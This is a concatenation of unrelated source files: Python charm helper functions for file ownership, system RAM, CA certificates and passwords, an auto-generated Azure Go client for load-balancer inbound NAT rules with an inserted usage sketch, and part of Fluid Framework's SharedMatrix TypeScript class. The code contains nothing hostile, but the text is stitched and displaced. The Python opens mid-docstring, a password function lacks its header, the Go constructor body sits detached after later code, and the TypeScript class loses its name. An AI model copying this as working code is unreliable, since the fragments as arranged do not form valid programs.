and group ownership of files and directories in given path. Doesn't chown path itself by default, only its children. :param str path: The string path to start changing ownership. :param str owner: The owner string to use when looking up the uid. :param str group: The group string to use when looking up the gid. 
:param bool follow_links: Also follow and chown links if True :param bool chowntopdir: Also chown path itself if True """ uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid if follow_links: chown = os.chown else: chown = os.lchown if chowntopdir: broken_symlink = os.path.lexists(path) and not os.path.exists(path) if not broken_symlink: chown(path, uid, gid) for root, dirs, files in os.walk(path, followlinks=follow_links): for name in dirs + files: full = os.path.join(root, name) broken_symlink = os.path.lexists(full) and not os.path.exists(full) if not broken_symlink: chown(full, uid, gid) def lchownr(path, owner, group): """Recursively change user and group ownership of files and directories in a given path, not following symbolic links. See the documentation for 'os.lchown' for more information. :param str path: The string path to start changing ownership. :param str owner: The owner string to use when looking up the uid. :param str group: The group string to use when looking up the gid. """ chownr(path, owner, group, follow_links=False) def owner(path): """Returns a tuple containing the username & groupname owning the path. :param str path: the string path to retrieve the ownership :return tuple(str, str): A (username, groupname) tuple containing the name of the user and group owning the path. :raises OSError: if the specified path does not exist """ stat = os.stat(path) username = pwd.getpwuid(stat.st_uid)[0] groupname = grp.getgrgid(stat.st_gid)[0] return username, groupname def get_total_ram(): """The total amount of system RAM in bytes. This is what is reported by the OS, and may be overcommitted when there are multiple containers hosted on the same machine. """ with open('/proc/meminfo', 'r') as f: for line in f.readlines(): if line: key, value, unit = line.split() if key == 'MemTotal:': assert unit == 'kB', 'Unknown unit' return int(value) * 1024 # Classic, not KiB. raise NotImplementedError() UPSTART_CONTAINER_TYPE = '/run/container_type' def is_container(): """Determine whether unit is running in a container @return: boolean indicating if unit is in a container """ if init_is_systemd(): # Detect using systemd-detect-virt return subprocess.call(['systemd-detect-virt', '--container']) == 0 else: # Detect using upstart container file marker return os.path.exists(UPSTART_CONTAINER_TYPE) def add_to_updatedb_prunepath(path, updatedb_path=UPDATEDB_PATH): """Adds the specified path to the mlocate's udpatedb.conf PRUNEPATH list. This method has no effect if the path specified by updatedb_path does not exist or is not a file. 
@param path: string the path to add to the updatedb.conf PRUNEPATHS value @param updatedb_path: the path the updatedb.conf file """ if not os.path.exists(updatedb_path) or os.path.isdir(updatedb_path): # If the updatedb.conf file doesn't exist then don't attempt to update # the file as the package providing mlocate may not be installed on # the local system return with open(updatedb_path, 'r+') as f_id: updatedb_text = f_id.read() output = updatedb(updatedb_text, path) f_id.seek(0) f_id.write(output) f_id.truncate() def updatedb(updatedb_text, new_path): lines = [line for line in updatedb_text.split("\n")] for i, line in enumerate(lines): if line.startswith("PRUNEPATHS="): paths_line = line.split("=")[1].replace('"', '') paths = paths_line.split(" ") if new_path not in paths: paths.append(new_path) lines[i] = 'PRUNEPATHS="{}"'.format(' '.join(paths)) output = "\n".join(lines) return output def modulo_distribution(modulo=3, wait=30, non_zero_wait=False): """ Modulo distribution This helper uses the unit number, a modulo value and a constant wait time to produce a calculated wait time distribution. This is useful in large scale deployments to distribute load during an expensive operation such as service restarts. If you have 1000 nodes that need to restart 100 at a time 1 minute at a time: time.wait(modulo_distribution(modulo=100, wait=60)) restart() If you need restarts to happen serially set modulo to the exact number of nodes and set a high constant wait time: time.wait(modulo_distribution(modulo=10, wait=120)) restart() @param modulo: int The modulo number creates the group distribution @param wait: int The constant time wait value @param non_zero_wait: boolean Override unit % modulo == 0, return modulo * wait. Used to avoid collisions with leader nodes which are often given priority. @return: int Calculated time to wait for unit operation """ unit_number = int(local_unit().split('/')[1]) calculated_wait_time = (unit_number % modulo) * wait if non_zero_wait and calculated_wait_time == 0: return modulo * wait else: return calculated_wait_time def install_ca_cert(ca_cert, name=None): """ Install the given cert as a trusted CA. The ``name`` is the stem of the filename where the cert is written, and if not provided, it will default to ``juju-{charm_name}``. If the cert is empty or None, or is unchanged, nothing is done. """ if not ca_cert: return if not isinstance(ca_cert, bytes): ca_cert = ca_cert.encode('utf8') if not name: name = 'juju-{}'.format(charm_name()) cert_file = '/usr/local/share/ca-certificates/{}.crt'.format(name) new_hash = hashlib.md5(ca_cert).hexdigest() if file_hash(cert_file) == new_hash: return log("Installing new CA cert at: {}".format(cert_file), level=INFO) write_file(cert_file, ca_cert) subprocess.check_call(['update-ca-certificates', '--fresh'])
"""Generate a random pasword.""" if length is None: # A random length is ok to use a weak PRNG length = random.choice(range(35, 45)) alphanumeric_chars = [ l for l in (string.ascii_letters + string.digits) if l not in 'l0QD1vAEIOUaeiou'] # Use a crypto-friendly PRNG (e.g. /dev/urandom) for making the # actual password random_generator = random.SystemRandom() random_chars = [ random_generator.choice(alphanumeric_chars) for _ in range(length)] return(''.join(random_chars))
inboundnatrules.go
package network // Copyright (c) Microsoft and contributors. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // // See the License for the specific language governing permissions and // limitations under the License. // // Code generated by Microsoft (R) AutoRest Code Generator. // Changes may cause incorrect behavior and will be lost if the code is regenerated. import ( "context" "github.com/Azure/go-autorest/autorest" "github.com/Azure/go-autorest/autorest/azure" "github.com/Azure/go-autorest/autorest/validation" "github.com/Azure/go-autorest/tracing" "net/http" ) // InboundNatRulesClient is the network Client type InboundNatRulesClient struct { BaseClient } // NewInboundNatRulesClient creates an instance of the InboundNatRulesClient client. func NewInboundNatRulesClient(subscriptionID string) InboundNatRulesClient { return NewInboundNatRulesClientWithBaseURI(DefaultBaseURI, subscriptionID) } // NewInboundNatRulesClientWithBaseURI creates an instance of the InboundNatRulesClient client using a custom endpoint. // Use this when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack). func NewInboundNatRulesClientWithBaseURI(baseURI string, subscriptionID string) InboundNatRulesClient
// CreateOrUpdate creates or updates a load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. // inboundNatRuleParameters - parameters supplied to the create or update inbound nat rule operation. func (client InboundNatRulesClient) CreateOrUpdate(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, inboundNatRuleParameters InboundNatRule) (result InboundNatRulesCreateOrUpdateFuture, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.CreateOrUpdate") defer func() { sc := -1 if result.Response() != nil { sc = result.Response().StatusCode } tracing.EndSpan(ctx, sc, err) }() } if err := validation.Validate([]validation.Validation{ {TargetValue: inboundNatRuleParameters, Constraints: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration.IPConfigurationPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration.IPConfigurationPropertiesFormat.PublicIPAddress", Name: validation.Null, Rule: false, Chain: nil}}}, }}, }}, }}, }}, }}, }}}}}); err != nil { return result, validation.NewError("network.InboundNatRulesClient", "CreateOrUpdate", err.Error()) } req, err := client.CreateOrUpdatePreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName, inboundNatRuleParameters) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "CreateOrUpdate", nil, "Failure preparing request") return } result, err = client.CreateOrUpdateSender(req) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "CreateOrUpdate", result.Response(), "Failure sending request") return } return } // CreateOrUpdatePreparer prepares the CreateOrUpdate request. 
func (client InboundNatRulesClient) CreateOrUpdatePreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, inboundNatRuleParameters InboundNatRule) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } inboundNatRuleParameters.Etag = nil inboundNatRuleParameters.Type = nil preparer := autorest.CreatePreparer( autorest.AsContentType("application/json; charset=utf-8"), autorest.AsPut(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithJSON(inboundNatRuleParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) CreateOrUpdateSender(req *http.Request) (future InboundNatRulesCreateOrUpdateFuture, err error) { var resp *http.Response resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client)) if err != nil { return } future.Future, err = azure.NewFutureFromResponse(resp) return } // CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) CreateOrUpdateResponder(resp *http.Response) (result InboundNatRule, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusCreated), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // Delete deletes the specified load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. func (client InboundNatRulesClient) Delete(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string) (result InboundNatRulesDeleteFuture, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.Delete") defer func() { sc := -1 if result.Response() != nil { sc = result.Response().StatusCode } tracing.EndSpan(ctx, sc, err) }() } req, err := client.DeletePreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Delete", nil, "Failure preparing request") return } result, err = client.DeleteSender(req) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Delete", result.Response(), "Failure sending request") return } return } // DeletePreparer prepares the Delete request. 
func (client InboundNatRulesClient) DeletePreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } preparer := autorest.CreatePreparer( autorest.AsDelete(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // DeleteSender sends the Delete request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) DeleteSender(req *http.Request) (future InboundNatRulesDeleteFuture, err error) { var resp *http.Response resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client)) if err != nil { return } future.Future, err = azure.NewFutureFromResponse(resp) return } // DeleteResponder handles the response to the Delete request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent), autorest.ByClosing()) result.Response = resp return } // Get gets the specified load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. // expand - expands referenced resources. func (client InboundNatRulesClient) Get(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, expand string) (result InboundNatRule, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.Get") defer func() { sc := -1 if result.Response.Response != nil { sc = result.Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } req, err := client.GetPreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName, expand) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", nil, "Failure preparing request") return } resp, err := client.GetSender(req) if err != nil { result.Response = autorest.Response{Response: resp} err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", resp, "Failure sending request") return } result, err = client.GetResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", resp, "Failure responding to request") } return } // GetPreparer prepares the Get request. 
func (client InboundNatRulesClient) GetPreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, expand string) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } if len(expand) > 0 { queryParameters["$expand"] = autorest.Encode("query", expand) } preparer := autorest.CreatePreparer( autorest.AsGet(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // GetSender sends the Get request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) GetSender(req *http.Request) (*http.Response, error) { return client.Send(req, azure.DoRetryWithRegistration(client.Client)) } // GetResponder handles the response to the Get request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) GetResponder(resp *http.Response) (result InboundNatRule, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // List gets all the inbound nat rules in a load balancer. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. func (client InboundNatRulesClient) List(ctx context.Context, resourceGroupName string, loadBalancerName string) (result InboundNatRuleListResultPage, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.List") defer func() { sc := -1 if result.inrlr.Response.Response != nil { sc = result.inrlr.Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } result.fn = client.listNextResults req, err := client.ListPreparer(ctx, resourceGroupName, loadBalancerName) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", nil, "Failure preparing request") return } resp, err := client.ListSender(req) if err != nil { result.inrlr.Response = autorest.Response{Response: resp} err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", resp, "Failure sending request") return } result.inrlr, err = client.ListResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", resp, "Failure responding to request") } return } // ListPreparer prepares the List request. 
func (client InboundNatRulesClient) ListPreparer(ctx context.Context, resourceGroupName string, loadBalancerName string) (*http.Request, error) { pathParameters := map[string]interface{}{ "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } preparer := autorest.CreatePreparer( autorest.AsGet(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // ListSender sends the List request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) ListSender(req *http.Request) (*http.Response, error) { return client.Send(req, azure.DoRetryWithRegistration(client.Client)) } // ListResponder handles the response to the List request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) ListResponder(resp *http.Response) (result InboundNatRuleListResult, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // listNextResults retrieves the next set of results, if any. func (client InboundNatRulesClient) listNextResults(ctx context.Context, lastResults InboundNatRuleListResult) (result InboundNatRuleListResult, err error) { req, err := lastResults.inboundNatRuleListResultPreparer(ctx) if err != nil { return result, autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", nil, "Failure preparing next results request") } if req == nil { return } resp, err := client.ListSender(req) if err != nil { result.Response = autorest.Response{Response: resp} return result, autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", resp, "Failure sending next results request") } result, err = client.ListResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", resp, "Failure responding to next results request") } return } // ListComplete enumerates all values, automatically crossing page boundaries as required. func (client InboundNatRulesClient) ListComplete(ctx context.Context, resourceGroupName string, loadBalancerName string) (result InboundNatRuleListResultIterator, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.List") defer func() { sc := -1 if result.Response().Response.Response != nil { sc = result.page.Response().Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } result.page, err = client.List(ctx, resourceGroupName, loadBalancerName) return }
{ return InboundNatRulesClient{NewWithBaseURI(baseURI, subscriptionID)} }
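// --- Illustrative usage sketch (editor addition, not part of the generated client above) ---
// A minimal example of walking every inbound NAT rule of a load balancer with the
// InboundNatRulesClient defined in this file. The resource group and load balancer
// names are hypothetical placeholders, and the client is assumed to already have its
// Authorizer configured; iterator paging uses the SDK's NotDone/NextWithContext pattern.
func listInboundNatRuleNames(ctx context.Context, client InboundNatRulesClient) ([]string, error) {
	var names []string
	// ListComplete transparently follows nextLink across result pages.
	iter, err := client.ListComplete(ctx, "example-rg", "example-lb")
	if err != nil {
		return nil, err
	}
	for iter.NotDone() {
		rule := iter.Value()
		if rule.Name != nil {
			names = append(names, *rule.Name)
		}
		if err := iter.NextWithContext(ctx); err != nil {
			return nil, err
		}
	}
	return names, nil
}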
matrix.ts
/*! * Copyright (c) Microsoft Corporation and contributors. All rights reserved. * Licensed under the MIT License. */ import { assert } from "@fluidframework/common-utils"; import { IFluidSerializer } from "@fluidframework/core-interfaces"; import { FileMode, ISequencedDocumentMessage, ITree, TreeEntry, } from "@fluidframework/protocol-definitions"; import { IFluidDataStoreRuntime, IChannelStorageService, Serializable, IChannelAttributes, } from "@fluidframework/datastore-definitions"; import { makeHandlesSerializable, parseHandles, SharedObject, } from "@fluidframework/shared-object-base"; import { ObjectStoragePartition } from "@fluidframework/runtime-utils"; import { IMatrixProducer, IMatrixConsumer, IMatrixReader, IMatrixWriter, } from "@tiny-calc/nano"; import { MergeTreeDeltaType, IMergeTreeOp, SegmentGroup, ISegment } from "@fluidframework/merge-tree"; import { debug } from "./debug"; import { MatrixOp } from "./ops"; import { PermutationVector, PermutationSegment } from "./permutationvector"; import { SparseArray2D } from "./sparsearray2d"; import { SharedMatrixFactory } from "./runtime"; import { Handle, isHandleValid } from "./handletable"; import { deserializeBlob, serializeBlob } from "./serialization"; import { ensureRange } from "./range"; import { IUndoConsumer } from "./types"; import { MatrixUndoProvider } from "./undoprovider"; const enum SnapshotPath { rows = "rows", cols = "cols", cells = "cells", } interface ISetOp<T> { type: MatrixOp.set, row: number, col: number, value: T, } interface ISetOpMetadata { rowHandle: Handle, colHandle: Handle, localSeq: number, } /** * A SharedMatrix holds a rectangular 2D array of values. Supported operations * include setting values and inserting/removing rows and columns. * * Matrix values may be any Fluid serializable type, which is the set of JSON * serializable types extended to include IFluidHandles. * * Fluid's SharedMatrix implementation works equally well for dense and sparse * matrix data and physically stores data in Z-order to leverage CPU caches and * prefetching when reading in either row or column major order. (See README.md * for more details.) */ export class
<T extends Serializable = Serializable> extends SharedObject implements IMatrixProducer<T | undefined | null>, IMatrixReader<T | undefined | null>, IMatrixWriter<T | undefined> { private readonly consumers = new Set<IMatrixConsumer<T | undefined | null>>(); public static getFactory() { return new SharedMatrixFactory(); } private readonly rows: PermutationVector; // Map logical row to storage handle (if any) private readonly cols: PermutationVector; // Map logical col to storage handle (if any) private cells = new SparseArray2D<T>(); // Stores cell values. private pending = new SparseArray2D<number>(); // Tracks pending writes. constructor(runtime: IFluidDataStoreRuntime, public id: string, attributes: IChannelAttributes) { super(id, runtime, attributes); this.rows = new PermutationVector( SnapshotPath.rows, this.logger, runtime, this.onRowDelta, this.onRowHandlesRecycled); this.cols = new PermutationVector( SnapshotPath.cols, this.logger, runtime, this.onColDelta, this.onColHandlesRecycled); } private undo?: MatrixUndoProvider; /** * Subscribes the given IUndoConsumer to the matrix. */ public openUndo(consumer: IUndoConsumer) { assert(this.undo === undefined, 0x019 /* "SharedMatrix.openUndo() supports at most a single IUndoConsumer." */); this.undo = new MatrixUndoProvider(consumer, this, this.rows, this.cols); } // TODO: closeUndo()? private get rowHandles() { return this.rows.handleCache; } private get colHandles() { return this.cols.handleCache; } /** * {@inheritDoc @fluidframework/datastore-definitions#IChannelFactory.create} */ public static create<T extends Serializable = Serializable>(runtime: IFluidDataStoreRuntime, id?: string) { return runtime.createChannel(id, SharedMatrixFactory.Type) as SharedMatrix<T>; } // #region IMatrixProducer openMatrix(consumer: IMatrixConsumer<T | undefined | null>): IMatrixReader<T | undefined | null> { this.consumers.add(consumer); return this; } closeMatrix(consumer: IMatrixConsumer<T | undefined | null>): void { this.consumers.delete(consumer); } // #endregion IMatrixProducer // #region IMatrixReader public get rowCount() { return this.rows.getLength(); } public get colCount() { return this.cols.getLength(); } public getCell(row: number, col: number): T | undefined | null { // Perf: When possible, bounds checking is performed inside the implementation for // 'getHandle()' so that it can be elided in the case of a cache hit. This // yields an ~40% improvement in the case of a cache hit (node v12 x64) // Map the logical (row, col) to associated storage handles. const rowHandle = this.rowHandles.getHandle(row); if (isHandleValid(rowHandle)) { const colHandle = this.colHandles.getHandle(col); if (isHandleValid(colHandle)) { return this.cells.getCell(rowHandle, colHandle); } } else { // If we early exit because the given rowHandle is unallocated, we still need to // bounds-check the 'col' parameter. ensureRange(col, this.cols.getLength()); } return undefined; } public get matrixProducer(): IMatrixProducer<T | undefined | null> { return this; } // #endregion IMatrixReader public setCell(row: number, col: number, value: T) { assert(0 <= row && row < this.rowCount && 0 <= col && col < this.colCount, 0x01a /* "Trying to set out-of-bounds cell!" */); this.setCellCore(row, col, value); // Avoid reentrancy by raising change notifications after the op is queued. 
for (const consumer of this.consumers.values()) { consumer.cellsChanged(row, col, 1, 1, this); } } public setCells(rowStart: number, colStart: number, colCount: number, values: readonly T[]) { const rowCount = Math.ceil(values.length / colCount); assert((0 <= rowStart && rowStart < this.rowCount) && (0 <= colStart && colStart < this.colCount) && (1 <= colCount && colCount <= (this.colCount - colStart)) && (rowCount <= (this.rowCount - rowStart)), 0x01b /* "Trying to set multiple out-of-bounds cells!" */); const endCol = colStart + colCount; let r = rowStart; let c = colStart; for (const value of values) { this.setCellCore(r, c, value); if (++c === endCol) { c = colStart; r++; } } // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(rowStart, colStart, rowCount, colCount, this); } } private setCellCore( row: number, col: number, value: T, rowHandle = this.rows.getAllocatedHandle(row), colHandle = this.cols.getAllocatedHandle(col), ) { if (this.undo !== undefined) { this.undo.cellSet( rowHandle, colHandle, /* oldvalue: */ this.cells.getCell(rowHandle, colHandle)); } this.cells.setCell(rowHandle, colHandle, value); if (this.isAttached()) { this.sendSetCellOp(row, col, value, rowHandle, colHandle); } } private sendSetCellOp( row: number, col: number, value: T, rowHandle: Handle, colHandle: Handle, localSeq = this.nextLocalSeq(), ) { assert(this.isAttached(), 0x1e2 /* "Caller must ensure 'isAttached()' before calling 'sendSetCellOp'." */); const op: ISetOp<T> = { type: MatrixOp.set, row, col, value, }; const metadata: ISetOpMetadata = { rowHandle, colHandle, localSeq, }; this.submitLocalMessage(op, metadata); this.pending.setCell(rowHandle, colHandle, localSeq); } private submitVectorMessage( currentVector: PermutationVector, oppositeVector: PermutationVector, dimension: SnapshotPath.rows | SnapshotPath.cols, message: any, ) { // Ideally, we would have a single 'localSeq' counter that is shared between both PermutationVectors // and the SharedMatrix's cell data. Instead, we externally advance each MergeTree's 'localSeq' counter // for each submitted op it not aware of to keep them synchronized. const localSeq = currentVector.getCollabWindow().localSeq; const oppositeWindow = oppositeVector.getCollabWindow(); // Note that the comparison is '>=' because, in the case the MergeTree is regenerating ops for reconnection, // the MergeTree submits the op with the original 'localSeq'. assert(localSeq >= oppositeWindow.localSeq, 0x01c /* "The 'localSeq' of the vector submitting an op must >= the 'localSeq' of the other vector." */); oppositeWindow.localSeq = localSeq; // If the SharedMatrix is local, it's state will be submitted via a Snapshot when initially connected. // Do not queue a message or track the pending op, as there will never be an ACK, etc. if (this.isAttached()) { // Record whether this `op` targets rows or cols. (See dispatch in `processCore()`) message.target = dimension; this.submitLocalMessage( message, currentVector.peekPendingSegmentGroups( message.type === MergeTreeDeltaType.GROUP ? 
message.ops.length : 1)); } } private submitColMessage(message: any) { this.submitVectorMessage(this.cols, this.rows, SnapshotPath.cols, message); } public insertCols(colStart: number, count: number) { this.submitColMessage(this.cols.insert(colStart, count)); } public removeCols(colStart: number, count: number) { this.submitColMessage(this.cols.remove(colStart, count)); } private submitRowMessage(message: any) { this.submitVectorMessage(this.rows, this.cols, SnapshotPath.rows, message); } public insertRows(rowStart: number, count: number) { this.submitRowMessage(this.rows.insert(rowStart, count)); } public removeRows(rowStart: number, count: number) { this.submitRowMessage(this.rows.remove(rowStart, count)); } /** @internal */ public _undoRemoveRows(segment: ISegment) { const original = segment as PermutationSegment; // (Re)insert the removed number of rows at the original position. const { op, inserted } = this.rows.insertRelative(original, original.cachedLength); this.submitRowMessage(op); // Transfer handles from the original segment to the newly inserted empty segment. original.transferHandlesTo(inserted); // Invalidate the handleCache in case it was populated during the 'rowsChanged' // callback, which occurs before the handle span is populated. const rowStart = this.rows.getPosition(inserted); this.rows.handleCache.itemsChanged( rowStart, /* removedCount: */ 0, /* insertedCount: */ inserted.cachedLength); // Generate setCell ops for each populated cell in the reinserted rows. let rowHandle = inserted.start; const rowCount = inserted.cachedLength; for (let row = rowStart; row < rowStart + rowCount; row++, rowHandle++) { for (let col = 0; col < this.colCount; col++) { const colHandle = this.colHandles.getHandle(col); const value = this.cells.getCell(rowHandle, colHandle); // eslint-disable-next-line no-null/no-null if (this.isAttached() && value !== undefined && value !== null) { this.sendSetCellOp( row, col, value, rowHandle, colHandle); } } } // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(rowStart, /* colStart: */ 0, rowCount, this.colCount, this); } } /** @internal */ public _undoRemoveCols(segment: ISegment) { const original = segment as PermutationSegment; // (Re)insert the removed number of columns at the original position. const { op, inserted } = this.cols.insertRelative(original, original.cachedLength); this.submitColMessage(op); // Transfer handles from the original segment to the newly inserted empty segment. original.transferHandlesTo(inserted); // Invalidate the handleCache in case it was populated during the 'colsChanged' // callback, which occurs before the handle span is populated. const colStart = this.cols.getPosition(inserted); this.cols.handleCache.itemsChanged( colStart, /* removedCount: */ 0, /* insertedCount: */ inserted.cachedLength); // Generate setCell ops for each populated cell in the reinserted cols. let colHandle = inserted.start; const colCount = inserted.cachedLength; for (let col = colStart; col < colStart + colCount; col++, colHandle++) { for (let row = 0; row < this.rowCount; row++) { const rowHandle = this.rowHandles.getHandle(row); const value = this.cells.getCell(rowHandle, colHandle); // eslint-disable-next-line 